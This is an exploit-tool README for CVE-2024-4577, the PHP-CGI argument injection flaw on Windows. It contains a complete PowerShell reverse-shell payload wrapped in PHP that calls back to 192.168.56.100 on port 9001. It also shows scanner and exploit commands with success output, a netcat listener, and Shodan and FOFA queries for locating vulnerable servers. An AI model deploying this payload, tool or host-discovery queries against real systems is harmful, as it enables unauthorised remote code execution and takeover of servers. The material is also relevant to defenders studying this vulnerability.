Share
## https://sploitus.com/exploit?id=2E73CEBB-42AD-5E5F-89A5-87433F27C085
<h1 align="center">
  PHP CGI Argument Injection (CVE-2024-4577) RCE 
</h2>

<p align="center">
    <a href="https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2024-4577-RCE">
    <img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2024-4577-RCE&label=Visitors&countColor=%2337d67a" />
    </a>
    <a href="https://www.facebook.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Facebook-%231877F2.svg?style=for-the-badge&logo=Facebook&logoColor=white" alt="Facebook">
    </a>
      <a href="https://www.twitter.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Twitter-%23000000.svg?style=for-the-badge&logo=X&logoColor=white" alt="X">
    </a>
    <a href="https://medium.com/@l0n3m4n">
        <img src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white" alt="Medium">
    </a>
    <a href="https://www.python.org/">
    <img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
    </a>
    <a href="https://www.kali.org/">
    <img src="https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white" alt="Kali">      
    </a>
</p>

## ๐Ÿ“œ Description 

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

"XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target
an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode."

## ๐Ÿ“š Table of Contents
- ๐Ÿ“œ [Description](#-description)
- ๐Ÿ› ๏ธ [Installation](#-installation)
- โš™๏ธ [Usage](#-usage)
- ๐Ÿ’ [References](#-references)
  
## ๐Ÿ› ๏ธ Installation 
```bash
$ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 
```
## โš™๏ธ Usage
![php-cge](/php-cgi.png)
## ๐Ÿค– Establishing reverse shell 

### PHP Payload
> [!NOTE]
> This tool demonstrates realistic attack and techniques (TTPs). However this specific payload sample does not function in this scenario. Modify the shell.php to obtain fully functional payload.
```php
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 
```
## ๐Ÿ–ฅ๏ธ Scanning server
```bash
$ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                      
    
[+] Target https://target.com is vulnerable to CVE-2024-4577
```

## ๐ŸŽฏ Exploiting Vulnerable server
```bash
$ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner  

[+] Exploit successful!
```

## ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป Netcat Listener
```bash
$ nc -lvnp 9001
```

## ๐Ÿ” Discovering vulnerable host
- **Shodan**: `server: PHP 8.1`, `server: PHP 8.2`, `server: PHP 8.3`
- **FOFA**: `protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"`
## ๐Ÿ’ References
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
- https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
- http://www.openwall.com/lists/oss-security/2024/06/07/1
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
- https://www.php.net/ChangeLog-8.php#8.1.29
- https://www.php.net/ChangeLog-8.php#8.2.20
- https://www.php.net/ChangeLog-8.php#8.3.8

## โš ๏ธ Disclaimer 
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool. [create issue](https://github.com/l0n3m4n/CVE-2024-4577-RCE/issues)